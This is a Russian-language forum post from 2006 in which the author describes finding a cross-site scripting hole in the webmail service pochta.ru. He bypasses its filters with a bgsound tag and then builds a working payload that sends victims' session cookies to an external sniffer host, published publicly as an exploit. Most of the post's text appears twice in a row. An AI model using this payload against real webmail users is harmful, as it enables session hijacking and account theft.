А®ТеS
07.12.2006, 12:51
Короче делать было нечего, решил поискать баги в каком нето почтовике. В начале был выбран e-mail.ru, но после того как я зарегал там ящик он отправился быстренька в даун (всегда говорил что сервис - ацтой) :D . так как неизвестно было когда он оттуда вернется, я всмомнил про еще один очень интересный почтовик (тоже глючной)) - pochta.ru . Туда то я и направился
Я зарегал там тестовый ящик и начал осмотр, то есть слать всякую фигню самому себе))). Первым что я попробовал было:
<img src="javascript:alert()">
Ну естессно это не прокатило, фильтры все обрезали (заразы). Сделав еще несколько безуспешных попыток я заюзал такую конструкцию:
<bgsound src="javascript:alert()">
Алерт вылетал!!! Ндысь, видимо горе кодеры незнали, что на веб-странички можно ставить звук и какой тег нужен)))ну лана их проблемы))))Дальше я начал составлять XSS-сплоит который остылал бы куки на сниффер. Почему то начально придуманный мной отказался работать, тут я посоветовался с Pete®'ом и он предложил следующюю конструкцию:
<bgsound src='javascript:document.images[0].src="http://sniffer.ru?"+document.cookie'>
которая оказалась рабочей
в этой истории можно было бы поставить большую и жирную точку, если бы не несколько факторов. Я тестил XSS на последней версии Оперы, после захода под IE оказалось что в ослике дырявость не пашет!!!!!Очень странно, я так и не въехал почему)))) Уязвимость я обнаружил в 6.12.06 21-00 по Москве. Выкладываю в паблик 7.12.06 11-50 по Москве....засекайте время )))))))).
Я зарегал там тестовый ящик и начал осмотр, то есть слать всякую фигню самому себе))). Первым что я попробовал было:
<img src="javascript:alert()">
Ну естессно это не прокатило, фильтры все обрезали (заразы). Сделав еще несколько безуспешных попыток я заюзал такую конструкцию:
<bgsound src="javascript:alert()">
Алерт вылетал!!! Ндысь, видимо горе кодеры незнали, что на веб-странички можно ставить звук и какой тег нужен)))ну лана их проблемы))))Дальше я начал составлять XSS-сплоит который остылал бы куки на сниффер. Почему то начально придуманный мной отказался работать, тут я посоветовался с Pete®'ом и он предложил следующюю конструкцию:
<bgsound src='javascript:document.images[0].src="http://sniffer.ru?"+document.cookie'>
которая оказалась рабочей
в этой истории можно было бы поставить большую и жирную точку, если бы не несколько факторов. Я тестил XSS на последней версии Оперы, после захода под IE оказалось что в ослике дырявость не пашет!!!!!Очень странно, я так и не въехал почему)))) Уязвимость я обнаружил в 6.12.06 21-00 по Москве. Выкладываю в паблик 7.12.06 11-50 по Москве....засекайте время )))))))).